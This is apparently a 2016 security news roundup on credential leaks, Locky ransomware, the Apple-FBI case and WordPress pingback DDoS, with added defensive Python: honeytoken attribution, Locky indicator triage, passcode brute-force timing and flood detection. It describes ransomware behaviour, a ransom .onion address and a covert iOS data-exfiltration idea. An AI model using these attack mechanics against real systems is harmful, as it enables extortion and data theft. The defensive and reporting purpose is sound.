In April 2015, a group of experts at Bitglass used watermarks to track data through the Deep Web and discover how far it travels after a data breach. The experts found that countries historically associated with cyber criminal activity, such as Russia, China and Brazil, were the principal access points for the identity data.
Now the same group of experts published the results of a second research, dubbed Project Cumulus “Where’s Your Data”, aiming to track fake personal data across the Internet.
The researchers created a fake identity for an employee of a fictitious retail bank, along with a functional web portal for the financial institution and a Google Drive account. They also associated the identity with real credit-card data, then leaked “phished” Google Apps credentials to the Dark Web and tracked the activity on these accounts.
The results were intriguing: the leaked data was accessed from 30 countries across six continents in just two weeks.
The leaked data was viewed more than 1,000 times and downloaded 47 times. In the first 24 hours the experts observed three Google Drive login attempts and five bank login attempts; within 48 hours of the initial leak files were being downloaded, and the account was viewed hundreds of times over the following month, with many attackers successfully accessing the victim’s other online accounts.
“Over 1400 hackers viewed the credentials,” states the report. “1 in 10 hackers who viewed the credentials attempted to log into the bank web portal.” “A torrent of activity resulted within hours of leaking the credentials, with over 1400 visits from over 30 countries recorded between the Dark Web postings and the bank web portal.”
In 36 percent of cases, attackers successfully accessed the victim’s other online accounts; 94 percent of those who accessed the Google Drive discovered the victim’s other online accounts and attempted to log into the bank’s web portal.
The Project Cumulus revealed that 68 percent of hackers accessed Google Drive and bank portal accounts from the Tor network in order to anonymize their identity online.
“One dark web community member encouraged novice hackers to use Tor in conjunction with a VPN service purchased using cryptocurrency, warning that any missteps could lead to prosecution under the Computer Fraud and Misuse Act.” continues the report.
The researchers at Bitglass noticed that most of the visitors of the web portal that did not use the Tor network were from Russia (34.85%), United States (15.67%), China (3.5%), Japan (2%).
Project Cumulus demonstrates the importance of a proper security posture in protecting our data: it highlights the danger of reusing login credentials and shows how quickly phished credentials spread, exposing sensitive data.
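How a watermark lets a tracker attribute later logins to a specific leak, as an added example that is not Bitglass’ own tooling: each posting gets a decoy login whose tag is an HMAC of the posting’s name, so a login attempt seen later on the decoy portal identifies which leak it came from, and the source IP is checked against a Tor exit list, the kind of attribution behind the report’s Tor percentage. The key, domain, log format, addresses and Tor exit set are all constructed for the example.

```python
import hashlib
import hmac
import re
from collections import Counter

WATERMARK_KEY = b"constructed-watermark-key"   # constructed; keep secret in real use
DECOY_DOMAIN = "decoy-bank.example"            # assumed domain the tracker controls
CHANNELS = ("pastebin-post", "darkweb-forum", "irc-channel")

# Constructed Tor exit set (TEST-NET addresses, not real exits).
TOR_EXITS = {"203.0.113.7", "203.0.113.9"}


def decoy_login(channel):
    """Decoy e-mail for one leak channel. The tag is an HMAC of the channel name,
    so a leaked file reveals nothing about the other postings, yet the tracker can
    recompute the tag to attribute any later login attempt."""
    tag = hmac.new(WATERMARK_KEY, channel.encode(), hashlib.sha256).hexdigest()[:8]
    return f"j.morgan.{tag}@{DECOY_DOMAIN}"


def channel_for_login(login, channels=CHANNELS):
    """Reverse lookup by recomputing each channel's tag; None if not a decoy."""
    return next((ch for ch in channels if decoy_login(ch) == login), None)


# Constructed access-log format: "<timestamp> <ip> <service> <login> <result>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<service>\S+) (?P<login>\S+) (?P<result>\S+)$")

SAMPLE_LOG = [
    f"2016-02-10T03:14:07Z 203.0.113.7 bank-portal {decoy_login('darkweb-forum')} fail",
    f"2016-02-10T03:15:40Z 203.0.113.7 bank-portal {decoy_login('darkweb-forum')} success",
    f"2016-02-10T09:02:11Z 198.51.100.5 google-drive {decoy_login('pastebin-post')} success",
    f"2016-02-11T17:45:59Z 203.0.113.9 bank-portal {decoy_login('pastebin-post')} fail",
    f"2016-02-12T01:00:03Z 192.0.2.44 bank-portal alice@decoy-bank.example fail",
]


def attribute(log_lines, channels=CHANNELS, tor_exits=TOR_EXITS):
    """Aggregate decoy-account activity by leak channel, service, Tor use and
    outcome. Lines for logins that are not decoys are returned separately."""
    by_channel, by_service, by_origin, results = Counter(), Counter(), Counter(), Counter()
    unattributed = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ch = channel_for_login(m["login"], channels)
        if ch is None:
            unattributed.append(line)
            continue
        by_channel[ch] += 1
        by_service[m["service"]] += 1
        by_origin["tor" if m["ip"] in tor_exits else "clearnet"] += 1
        results[(ch, m["result"])] += 1
    return {"by_channel": dict(by_channel), "by_service": dict(by_service),
            "by_origin": dict(by_origin), "results": dict(results),
            "unattributed": unattributed}


if __name__ == "__main__":
    for ch in CHANNELS:
        print(f"{ch:14} -> {decoy_login(ch)}")
    summary = attribute(SAMPLE_LOG)
    for key in ("by_channel", "by_service", "by_origin", "results"):
        print(key, summary[key])
```

Because the tag is keyed, someone who obtains one decoy login cannot enumerate the others or tell that the account is a canary, while the tracker can attribute every hit without a lookup table that itself could leak.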
Malicious spam campaign capitalizes the global interest in the Zika virus
20.2.2016 Spam
The cybercrime ecosystem is getting ready to exploit the media attention on the Zika virus infections for illegal activities. Be careful!
What is the relationship between the Zika virus and malware? Just opportunity: the cyber crime ecosystem readily exploits media attention on current events for illegal activities. The Zika virus was declared a Public Health Emergency by the World Health Organization (WHO) on February 1, 2016. Zika appears to be responsible for birth defects, and populations in the Americas were its first victims.
Security experts at Symantec have spotted a malicious spam campaign seeking to exploit the interest in the event.
“Newsworthy events on a regional or global level often provide fertile ground for cybercriminals seeking to capitalize on the interest in these events. In this case, the Zika virus’ impact in countries like Brazil is being leveraged, while the potential impact in other countries make it a prime candidate for more malicious spam.” states a blog post published by Symantec.
Most cases of the Zika virus were reported in Brazil, the same country where cyber security experts have spotted the malicious spam campaign.
The campaign targeting Brazilians relies on malicious spam emails that purport to come from Saúde Curiosa (Curious Health), a Brazilian health web portal.
The messages used the following subject:
“ZIKA VIRUS! ISSO MESMO, MATANDO COM ÁGUA!” which translates to: “Zika Virus! That’s Right, killing it with water!”
The text of the message includes buttons and attachments displaying the message “Eliminating Mosquito! Click Here!” and “Instructions To Follow! Download!” as well as a file attachment.
The buttons redirect victims to the file hosting service Dropbox, where the experts found the same file that is attached to the spam emails (detected as JS.Downloader), which the crooks use to download additional malware onto the infected machine.
Symantec provided the following suggestion to limit the exposure to this specific hacking campaign:
For information about the Zika virus, visit the World Health Organization’s website
Always look for trusted news sources, regionally and globally, for additional information
Avoid clicking on links or opening attachments in unsolicited email messages
Run security software on your computer and ensure that it is up to date
FBI Screwed Up — Police Reset Shooter's Apple ID Passcode that leaves iPhone Data Unrecoverable
20.2.2016 Apple
Another Surprising Twist in the Apple-FBI Encryption Case: The Apple ID Passcode Changed while the San Bernardino Shooter's iPhone was in Government Custody.
Yes, the Federal Bureau of Investigation (FBI) has screwed up and is left with no easy option to retrieve data from the iPhone that belonged to San Bernardino shooter Syed Farook.
Apple has finally responded to the Department of Justice (DoJ) court filing that attempts to force Apple to comply with an FBI request to help the feds unlock Farook's iPhone, but Apple refused to do so.
According to Apple, the company had been helping the feds with the investigation since early January to find a way to access Farook's iPhone, but the problem is that the feds approached the company only after making a blunder themselves.
Here's How the FBI Screwed itself
On October 19, 2015, roughly six weeks before the San Bernardino terrorist attack, Syed Farook's iPhone 5C made its last full iCloud backup, which Apple had already provided to the FBI under a court order.
Now the FBI is looking for the data stored on Farook's phone between October 19, 2015, and the date of the attack, December 2, which has not been synced to Farook's iCloud account.
When the FBI approached Apple to help them brute force the passcode without losing data, Apple suggested an alternative: connect Farook's iPhone to the Internet by bringing it within range of a known Wi-Fi network, so that the phone would automatically back up its data to his iCloud account.
But the Twist lies here:
Just after the terrorist attack, an unnamed San Bernardino official reset the Apple ID password associated with Farook's iPhone 5C, "less than 24 hours after the government took possession of the device", in an attempt to access the data.
Here's the blunder:
Resetting the Apple ID password invalidates the iCloud credentials held by devices signed in with that account, so the phone will not sync its data online again until the user enters the newly generated password in the device settings.
Unfortunately, Farook's iPhone is already LOCKED, and Apple has refused to provide a backdoor to bypass the device passcode.
So the authorities are now left with no way to pull the data from iCloud, even if they take the device within range of a known Wi-Fi network.
Here's what a senior Apple executive who requested anonymity told BuzzFeed:
The Apple ID passcode linked to the iPhone belonging to one of the San Bernardino terrorists was changed less than 24 hours after the government took possession of the device, senior Apple executives said Friday. If that hadn't happened, Apple said, a backup of the information the government was seeking may have been accessible…
The executives said the company had been in regular discussions with the government since early January, and that it proposed four different ways to recover the information the government is interested in without building a back door. One of those methods would have involved connecting the phone to a known wifi network.
The statement came just hours after the DoJ criticized Apple's response to the court order.
Possible Alternative Ways to Recover Data
But there could still be a way to get the data the FBI needs. One option would be for Apple to simply revert the changes made to Farook's iCloud account, if that is possible.
This way the feds could bring the phone to a known Wi-Fi network and have the data automatically synced to the associated iCloud account, unless Farook had deliberately turned off auto-backup.
Another possible way to recover the data without unlocking the device would be to push an iOS software update (if and only if an update can be installed without user interaction) carrying an additional built-in application that simply backs up every file on the system to a third-party server.
Donald Trump — Boycott Apple! But Still Tweeting from an iPhone
20.2.2016 Apple
As the groundwork for the United States presidential election of 8 November 2016 is being laid, candidates are busy sharpening their positions to win voters' trust.
Taking a strong stand on the national issues of the moment can bring a candidate into the limelight.
Donald Trump (a Republican presidential candidate) is no exception.
During a rally in South Carolina yesterday, Trump made a controversial call to boycott Apple until the company hands over the San Bernardino terrorist's phone data to the authorities.
"First of all, Apple ought to give the security for that phone. What I think you ought to do is boycott Apple until they give that security number," Trump addressed in the rally.
The call was a reaction to Apple's refusal of a California magistrate judge's order to build a backdoor for the shooter's iPhone.
Although many politicians have slammed Apple's decision, the company's stance is backed by big players such as Google, Facebook, Twitter and WhatsApp.
Donald Trump: Boycott Apple
Though Donald Trump's reaction to Apple's stand against the FBI sounds very aggressive, the most interesting detail is that he posted the controversial tweet from his iPhone.
As Trump's tweet drew an overwhelming response on Twitter, NSA whistleblower Edward Snowden chimed in with the statement "can we boycott Trump instead."
Trump had earlier called Snowden a "grandstander" and, appearing on the program "Fox and Friends" in 2013, indirectly called for his execution for leaking the NSA's illegal activities.
Now Snowden has had his tit for tat via a tweet.
Trump Pledged Not to Use iPhone
Apart from his call to boycott Apple, Trump pledged that he would not use his iPhone until Apple gives the FBI the data from the terrorist's locked phone.
"I use both iPhone & Samsung. If Apple doesn't give info to authorities on the terrorists I'll only be using Samsung until they give info," Trump tweeted.
As Trump has made headlines with tweets to boost his campaign, it remains to be seen whether other candidates will follow the same road and inflate the "Apple vs. FBI" issue further.
Linux Foundation Launches 'Zephyr', a tiny OS for Internet of Things
20.2.2016 OS
The 21st century is witnessing a great change in daily life with the advent of IoT devices capable of talking to each other without human intervention.
You no longer have to give each home device its own instruction to accomplish a task; the actuators and sensors built into home appliances automate it.
The catch is that IoT devices often only work with products from the same manufacturer. For example, a Samsung smart refrigerator and a wearable from Apple or another vendor may not be able to talk to each other.
No need to worry now!
Zephyr: Future of IoTs
The Linux Foundation aims to lower these compatibility barriers by releasing a Real-Time Operating System (RTOS) for Internet of Things devices, dubbed "Zephyr", which lets connected devices communicate using common protocols.
So, no more digital barricades between your thermostat and your wearable devices, as they could communicate with each other using the same protocols.
The Zephyr project is backed by companies including NXP Semiconductors, Synopsys and UbiquiOS Technology, and is licensed under Apache 2.0.
Why is Zephyr so important?
Zephyr stands out from the crowd because it provides a scalable, customizable, secure and open source operating system usable across multiple architectures.
In doing so, Zephyr could help solve many of the current limitations that have so far prevented the Internet of Things from becoming truly mainstream.
Zephyr is expected to combine the best of both worlds: low power consumption and speed.
Here's some key points about Zephyr:
Scalability: Universality of Interconnected devices
Umbrella Platform: All smart devices could run under a single roof.
Tiny Kernel Footprint: the Zephyr kernel can run on devices with as little as 8 KB of memory.
Modularity: Supports to integrate 3rd party modules for additional functions as intended by the developer.
Licensing: a single permissive license (Apache 2.0) covers the whole project, so startups do not have to worry about licensing clashes.
Apart from these features, Zephyr also supports technologies including Bluetooth, Bluetooth Low Energy, IEEE 802.15.4, 6LoWPAN, CoAP, IPv4 and IPv6, and NFC, and boards including the Arduino 101, Arduino Due, Intel Galileo Gen 2 and NXP FRDM-K64F Freedom board.
Security in Mind
Since connected devices are among the most hack-prone items around, a compromised device can easily be made to malfunction.
However, the Linux Foundation is concerned about the security of individuals, and open source software has the advantage that anyone can inspect the code for flaws and fix them.
For this reason, the Linux Foundation maintains a dedicated security working group and a delegated security maintainer reachable through IRC, so that anyone can report vulnerabilities in open discussion.
Although there are other RTOS alternatives for the Internet of Things, such as Brillo from Google, Rocket from Intel and Ubuntu Core from Canonical, none looks as promising as Zephyr.
Locky Ransomware uses AES to encrypt Local Files and Unmapped Network Shares
20.2.2016 Virus
Security researchers discovered a strain of ransomware called Locky that uses AES encryption to encrypt local files and files on network shares.
Security researchers have discovered a new piece of ransomware called Locky, which uses the AES encryption algorithm to encrypt both local files and files on network shares, even if they are unmapped.
The new strain was spotted by the experts at BleepingComputer.
“A new ransomware has been discovered called Locky that encrypts your data using AES encryption and then demands .5 bitcoins to decrypt your files. ” BleepingComputer reports in a blog post.
The experts noted that Locky is the second ransomware spotted in recent months that is able to encrypt files on unmapped network shares, a trend that follows the online availability of ransomware source code such as Hidden Tear.
The Locky ransomware is being spread via malicious emails with Word document attachments that pretend to be an invoice, but that includes malicious macros. When the victim enables macros to view the document, it triggers a downloader for the Locky ransomware. The malware is then downloaded from a remote server and executed.
Like the CryptoWall ransomware, Locky renames encrypted files to make data recovery harder.
When started, Locky generates and assigns a unique 16-hexadecimal-digit ID to the infected machine, then scans all drives and unmapped network shares for files to encrypt.
The malware uses the AES encryption algorithm and encrypts only file with extensions matching a certain criteria while it skips files containing certain strings in their full pathname and filename (i.e. tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, and Windows).
The Locky ransomware encrypts files and renames them to [unique_id][identifier].locky; the researchers also found that the unique ID and other information are embedded at the end of each encrypted file.
The malware also deletes the Volume Shadow Copies, making it impossible to restore previous versions of the files from them.
Locky leaves a ransom note, _Locky_recover_instructions.txt, in each folder containing encrypted files.
“Inside the Locky ransom notes are links to a Tor site called the Locky Decrypter Page. This page is located at 6dtxgqam4crv6rr6.onion and contains the amount of bitcoins to send as a payment, how to purchase the bitcoins, and the bitcoin address you should send payment to. Once a victim sends payment to the assigned bitcoin address, this page will provide a decrypter that can be used to decrypt their files.” continues the post.
“Locky will change the Windows wallpaper to %UserProfile%\Desktop\_Locky_recover_instructions.bmp, which contains the same instructions as the text ransom notes.”
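Added example, not code from the BleepingComputer analysis or from Locky itself: a Python triage helper that applies the indicators described above to a file listing. It recognises encrypted files by the [unique_id][identifier].locky naming pattern (the text fixes only the 16-hex-digit victim ID; the per-file identifier is assumed to be hexadecimal too), collects the ransom notes, and reports which remaining files Locky would not have skipped according to its path exclusion list, i.e. which are still at risk on a reachable share. The listing is constructed.

```python
import os
import re
from collections import defaultdict

# Path fragments the analysis above lists as skipped by Locky.
LOCKY_SKIP_STRINGS = [
    "tmp", "winnt", "Application Data", "AppData", "Program Files (x86)",
    "Program Files", "temp", "thumbs.db", "$Recycle.Bin",
    "System Volume Information", "Boot", "Windows",
]

# Encrypted-file name: 16-hex-digit victim ID, a per-file identifier, ".locky".
# Assumption: the identifier is hexadecimal; the text fixes only the ID length.
LOCKY_NAME = re.compile(r"^(?P<victim>[0-9A-Fa-f]{16})(?P<file_id>[0-9A-Fa-f]+)\.locky$")
RANSOM_NOTES = {"_Locky_recover_instructions.txt", "_Locky_recover_instructions.bmp"}

# Constructed listing mixing a file server share and a workstation.
SAMPLE_LISTING = [
    r"\\fileserver\finance\2015\invoice.docx",
    r"\\fileserver\finance\2015\1E6B9C0C3A4F5D7E0A1B2C3D4E5F6A7B.locky",
    r"\\fileserver\finance\2015\_Locky_recover_instructions.txt",
    r"C:\Users\alice\Desktop\_Locky_recover_instructions.bmp",
    r"C:\Users\alice\Documents\1E6B9C0C3A4F5D7E9F8E7D6C5B4A3928.locky",
    r"C:\Users\alice\AppData\Roaming\settings.ini",
    r"C:\Windows\System32\kernel32.dll",
    r"D:\backups\photos\holiday.jpg",
]


def locky_would_skip(path):
    """True if any skip string occurs anywhere in the full path. A case-insensitive
    substring match is assumed; the text only says 'containing certain strings'."""
    lowered = path.lower()
    return any(s.lower() in lowered for s in LOCKY_SKIP_STRINGS)


def scan_listing(paths):
    """Classify paths into encrypted files grouped by victim ID, ransom notes, and
    'exposed' files: unencrypted files Locky would not skip, i.e. still at risk."""
    result = {"encrypted": defaultdict(list), "notes": [], "exposed": []}
    for p in paths:
        name = os.path.basename(p.replace("\\", "/"))
        m = LOCKY_NAME.match(name)
        if m:
            result["encrypted"][m.group("victim").lower()].append(p)
        elif name in RANSOM_NOTES:
            result["notes"].append(p)
        elif not locky_would_skip(p):
            result["exposed"].append(p)
    result["encrypted"] = dict(result["encrypted"])
    return result


if __name__ == "__main__":
    r = scan_listing(SAMPLE_LISTING)
    for victim, files in r["encrypted"].items():
        print(f"victim {victim}: {len(files)} encrypted file(s)")
    print("ransom notes:", len(r["notes"]), " still exposed:", len(r["exposed"]))
```

The victim ID recovered from the file names lets you tell how many infected machines wrote to a share. Because the exclusion list is a substring match on the whole path, a folder named, say, tmp_reports is skipped as well, so the list cannot be used to identify locations that are safe by design.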
15-year-old Teenage Hacker Arrested Over FBI Computer Hack
19.2.2016 Hacking
Another 15-year-old teenager has been arrested in Scotland by British police for breaking into FBI systems, on 16 February.
The boy was arrested under Britain's anti-hacking law, the Computer Misuse Act 1990, for his role in the hacking and unauthorized access to digital material.
Federal agents flew to Glasgow to take part in a raid on his home before the boy's arrest.
"He has since been released and is the subject of a report to the procurator fiscal," a Police Spokesman told a Scottish journal.
According to reports, the boy could be extradited to the United States to face intrusion and hacking charges.
Second Member of the Hacking Group Arrested
The suspect is believed to be an active member of the notorious hacking group called "Crackas with Attitude" aka "CWA", Motherboard confirms.
Another member of the same group was arrested in the United Kingdom last week: a 16-year-old British teenager suspected of hacking into the accounts of CIA and FBI officials.
The hacktivist group "Crackas with Attitude" is behind a series of hacks on the United States government and its high-level officials, including:
Leaked the personal and sensitive details of tens of thousands of FBI agents and the US Department of Homeland Security (DHS) employees.
Hacked into AOL emails of CIA director John Brennan.
Hacked into the personal phone accounts and emails of the US spy chief James Clapper.
Broke into AOL emails of the FBI Deputy Director Mark Giuliano.
Last Member of Hacking Group Left
Additionally, it is assumed that only one more member of CWA (using the pseudonym "Thwarting Exploits") remains to be busted, as a tweet of his made clear that this was the third member of the group to be arrested.
Nowadays the amateurish approach of teenage hackers is embarrassing the world's greatest crime solvers, such as the FBI and CIA.
The arrested cyber criminals could spend much of their lives behind bars: the cyber laws are strict enough that sentences can add up to many years, sometimes beyond a lifetime.
Now We Know — Apple Can Unlock iPhones, Here's How to Hack-Proof your Device
19.2.2016 Apple
Apple has been asked to comply with a federal court order to help the FBI unlock an iPhone 5C used by one of the terrorists in the San Bernardino mass shooting that killed 14 and injured 24 in December.
The FBI knows that it cannot bypass the encryption on the iPhone, but it also knows that Apple can build a way for it to try more than 10 passcodes on the dead shooter's iPhone without the device's data being erased.
Although Apple refused to comply with the court order and has long claimed that it can no longer unlock phones, the FBI's request shows that Apple does have a technical way to help the feds access data on a locked iOS device.
And this is the first time Apple has not denied that it can unlock an iPhone; it has simply refused to build the FBI a backdoor, in order to maintain its users' trust.
So now we know that Apple is not doing so, but has the ability to do so.
Now that you know your locked iPhone could be accessed by the government even with the "Erase Data" (auto-destruct) feature enabled, you need to protect your iPhone with more than a 4- or 6-digit passcode.
How to Hack-Proof your iPhone?
Yes, it is possible to protect yourself from government snooping just by setting a strong passcode on your iPhone: one that the FBI or any other agency would not be able to crack even if they got the backdoor from Apple.
Without wasting much of your time, here's one simple solution:
Simply Set at least random 11-digit numeric passcode for your iPhone.
Here's why (FBI Can't Crack It):
There is only one way to crack your iPhone passcode: brute force. This is what the FBI is demanding from Apple: a special version of iOS that allows unlimited brute-force attempts and ignores the data-erasure setting.
iOS deliberately makes each passcode attempt take about 80 milliseconds, according to Apple, because the key derivation is tuned to that cost.
So, if your iPhone is using a 6-digit passcode and there are 1 Million possible combinations as a whole, it would take maximum time of 22 hours or on average 11 hours to successfully unlock iPhone.
However, if you are using a longer passcode such as a random 11-digit passcode, it will take up to 253 years, and on average 127 years to unlock iPhone.
Doing so will make the FBI or any other agency unable to unlock your iPhone; not unless they have hundreds of years to spare.
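The arithmetic behind those figures, as an added worked example that is not from the original article: with the erase-after-10 and delay logic removed, only the 80 ms per-attempt cost remains, so the worst-case time is keyspace × 0.08 s and the expected time is half that. The helper below reproduces the 22-hour and 253-year figures and extends the calculation to alphanumeric passcodes, which is where the real gain lies.

```python
SECONDS_PER_GUESS = 0.080          # per-attempt cost the text cites from Apple
SECONDS_PER_YEAR = 365.25 * 86400


def keyspace(length, alphabet_size=10):
    """Number of possible passcodes: numeric by default (alphabet_size=10)."""
    return alphabet_size ** length


def brute_force_seconds(length, alphabet_size=10, seconds_per_guess=SECONDS_PER_GUESS):
    """(worst_case, average) seconds to brute-force a passcode, assuming the
    erase-after-10 and escalating delays have been removed as the FBI requested,
    so only the per-guess cost remains. On average the right code is found
    halfway through the keyspace."""
    worst = keyspace(length, alphabet_size) * seconds_per_guess
    return worst, worst / 2


def human(seconds):
    """Largest convenient unit, one decimal."""
    for unit, size in (("years", SECONDS_PER_YEAR), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


def table(lengths=(4, 6, 8, 11), alphabet_size=10):
    """Rows of (length, worst-case, average) in human units."""
    return [(n,) + tuple(human(t) for t in brute_force_seconds(n, alphabet_size))
            for n in lengths]


if __name__ == "__main__":
    print("numeric passcodes (10 symbols):")
    for n, worst, avg in table():
        print(f"  {n:2d} digits: worst {worst:>12}, average {avg}")
    # Extension: with 62 symbols (a-z, A-Z, 0-9) a 6-character code is still short
    # of the 11-digit numeric one, but an 8-character code is far beyond it.
    print("alphanumeric passcodes (62 symbols):")
    for n, worst, avg in table((6, 8), 62):
        print(f"  {n:2d} chars:  worst {worst:>12}, average {avg}")
```

The 80 ms figure is the per-guess cost of the key derivation alone; it assumes the attacker has the weakened firmware the FBI asked for and guesses on the device itself, since the key is entangled with the hardware and cannot be brute-forced elsewhere.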
To set a strong passcode, open the passcode settings, tap 'Passcode Options', select 'Custom Numeric Code' and enter your new random passcode.
Things to Avoid While Setting a Passcode
1. Do Not Use a Predictable Passcode: Avoid predictable strings such as birth dates, phone numbers or social security numbers; they are the first things an attacker tries.
2. Do Not Use iCloud Backups: An iCloud backup lets an attacker obtain a copy of all your iPhone's data from Apple's servers, where your passcode no longer protects it, which eliminates the need to guess the passcode at all.
3. Do Not Use Your Fingerprint: Data breaches have exposed fingerprints online, Apple's Touch ID scanner has been bypassed with fake fingerprints, and a fingerprint can even be taken from a suspect's corpse. Note that iOS falls back to the passcode after a reboot, after five failed fingerprint attempts or after 48 hours without an unlock, so Touch ID does not replace your passcode; it only adds another way to unlock the phone, in far less time than brute force.
So, with a strong passcode, the FBI or any other agency will not be able to unlock your encrypted iPhone, even if they install a weakened version of iOS on it.
Warning: You need to remember whatever passcode you set, because no one except you will be able to unlock your iPhone. If you forget it, there is nothing you can do to get your data, or access to the phone, back.
AV-TEST 2015 AWARDs – Which are the best antivirus solutions?
19.2.2016 Virus
2015 awards – For the fifth year in succession, the AV-TEST Institute has awarded the firms that offered the most effective IT protection solutions.
On February 17, 2016, the independent AV-TEST Institute presented its AV-TEST AWARDs to the companies whose antivirus software performed best during 2015. The awards went to products in the categories "PROTECTION", "PERFORMANCE", "USABILITY", "REPAIR" and "ANDROID SECURITY", each divided into the user groups of home and corporate users.
The awarded products were tested in the institute's laboratory throughout 2015.
AV-TEST 2015 AWARDS
PROTECTION
The AV-TEST BEST PROTECTION 2015 AWARD goes to the software with the best protection against malware; this year the experts gave it to Symantec Norton Security for home users and to Symantec Endpoint Protection among corporate solutions.
PERFORMANCE
The experts measured the impact of protection solutions on the speed of a Windows PC and gave the AV-TEST BEST PERFORMANCE 2015 AWARD in the home-user field to Bitdefender Internet Security and Kaspersky Internet Security, while the best corporate solution is Bitdefender Endpoint Security.
USABILITY
Antivirus solutions are becoming ever more user-friendly; the experts who tested them gave the AV-TEST BEST USABILITY 2015 AWARD in the home-user area to two products with a tie score, Avira AntiVirus Pro and Kaspersky Internet Security. The award for corporate products goes to Intel Security's McAfee Endpoint Security.
REPAIR
Which is the best tool for repairing Windows systems after a malware attack? The researchers gave the AV-TEST BEST REPAIR 2015 AWARD to the Avira Antivirus Pro security suite and to the Kaspersky Virus Removal Tool.
ANDROID SECURITY
Let's close with the best solution for protecting Android devices: the experts at AV-TEST gave the AV-TEST BEST ANDROID SECURITY PRODUCT 2015 AWARD to Bitdefender Mobile Security, which obtained the best results across all test categories. The second award goes to Sophos Mobile Security.
Thousands of WordPress websites used as a platform to launch DDoS attacks
19.2.2016 Computer Attack
In a recent investigation, security researchers at Sucuri revealed that 26,000 different WordPress sites were being abused to launch Layer 7 distributed denial of service (DDoS) attacks.
In a recent investigation, security researchers at Sucuri found 26,000 different WordPress sites generating a sustained 10,000 to 11,000 HTTPS requests per second against one website, sometimes peaking at 20,000. The problem is that any WordPress site can be used to attack the availability of other websites if its pingback feature is enabled, which is the default setting.
An HTTP flood, or Layer 7 attack, inundates the web server with application-layer requests and disrupts it by exhausting resources at the application layer rather than the network layer. Such attacks do not need as many requests or as much bandwidth to cause damage, because each request forces heavy memory and CPU consumption in most PHP applications, content management systems (CMS) and databases.
Daniel Cid, founder and CTO of Sucuri, recommends disabling pingbacks on your site. It won't protect you from being attacked, but it will stop your site from attacking others.
“The best course of action is to disable pingbacks and if possible, disable xmlrpc altogether if you are not using it. If you are, you can make some very small changes to your .htaccess file to allow only whitelisted IPs to access the file. This might be the case with the popular JetPack plugin.” He said.
Figure 1 Taken from http://www.tweaktown.com/
It has been known for years that the WordPress pingback service can be abused for DDoS attacks, mainly because website owners rarely bother to prevent their sites from being drafted into a botnet. Since the attack comes from thousands of different IPs, network-based firewalls do little to stop it, as they only rate-limit per IP address. The researchers found that the majority of IP addresses used in this attack belonged to sites hosted on popular VPS/cloud/dedicated server providers: Amazon AWS, Digital Ocean, Google Cloud, Microsoft Azure, Hetzner, OVH and Linode.
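What such a flood looks like from the victim's side, as an added example that is not from Sucuri's post: the User-Agent WordPress sends when it verifies a pingback has the form "WordPress/<version>; <site-url>; verifying pingback from <ip>" (the string WordPress core builds), so a burst of those requests from many different sites against one URL is the reflection pattern described above. The access-log lines below are constructed for the example; the script groups pingback-verification hits by target path, ignoring the query string that floods randomise to defeat caching.

```python
import re
from collections import defaultdict

# Added example, not from Sucuri's post: find a pingback-driven HTTP flood in a
# combined-format access log. WordPress verifies a pingback with a User-Agent of
# "WordPress/<version>; <site-url>; verifying pingback from <ip>", so many such
# requests from many different sites hitting one URL is the reflection pattern.
# The log lines below are constructed.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
PINGBACK_UA_RE = re.compile(
    r'^WordPress/[\w.]+; (?P<site>\S+); verifying pingback from (?P<claimed>\S+)$')

SAMPLE_LOG = """\
203.0.113.10 - - [18/Feb/2016:10:00:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "WordPress/4.4.2; http://blog-a.example; verifying pingback from 198.51.100.7"
203.0.113.11 - - [18/Feb/2016:10:00:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "WordPress/4.3.1; http://blog-b.example; verifying pingback from 198.51.100.7"
203.0.113.12 - - [18/Feb/2016:10:00:02 +0000] "GET /?1455789602 HTTP/1.1" 200 5123 "-" "WordPress/4.4.2; https://blog-c.example; verifying pingback from 198.51.100.7"
203.0.113.13 - - [18/Feb/2016:10:00:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "WordPress/4.2.7; http://blog-d.example; verifying pingback from 198.51.100.7"
203.0.113.14 - - [18/Feb/2016:10:00:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "WordPress/4.4.2; http://blog-e.example; verifying pingback from 198.51.100.7"
203.0.113.10 - - [18/Feb/2016:10:00:03 +0000] "GET / HTTP/1.1" 200 5123 "-" "WordPress/4.4.2; http://blog-a.example; verifying pingback from 198.51.100.7"
198.51.100.40 - - [18/Feb/2016:10:00:03 +0000] "GET /about HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/44.0"
198.51.100.41 - - [18/Feb/2016:10:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 1024 "-" "WordPress/4.4.2; http://blog-f.example; verifying pingback from 198.51.100.9"
"""

def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def pingback_report(lines, min_reflectors=3):
    """Group pingback-verification hits by target path (query string dropped, since
    floods randomise it to bypass caches). A path is flagged when at least
    `min_reflectors` distinct WordPress sites hit it. Returns {path: summary}."""
    per_path = defaultdict(lambda: {"requests": 0, "sites": set(), "ips": set(), "claimed": set()})
    for line in lines:
        rec = parse_combined(line)
        if not rec:
            continue
        ua = PINGBACK_UA_RE.match(rec["ua"])
        if not ua:
            continue                       # an ordinary visitor, not a reflector
        bucket = per_path[rec["path"].split("?", 1)[0]]
        bucket["requests"] += 1
        bucket["sites"].add(ua.group("site"))     # the abused WordPress site
        bucket["ips"].add(rec["ip"])              # its hosting address
        bucket["claimed"].add(ua.group("claimed"))  # who sent it the pingback.ping call
    return {
        path: {
            "requests": b["requests"],
            "reflector_sites": len(b["sites"]),
            "source_ips": len(b["ips"]),
            "claimed_origins": sorted(b["claimed"]),
            "flagged": len(b["sites"]) >= min_reflectors,
        }
        for path, b in per_path.items()
    }

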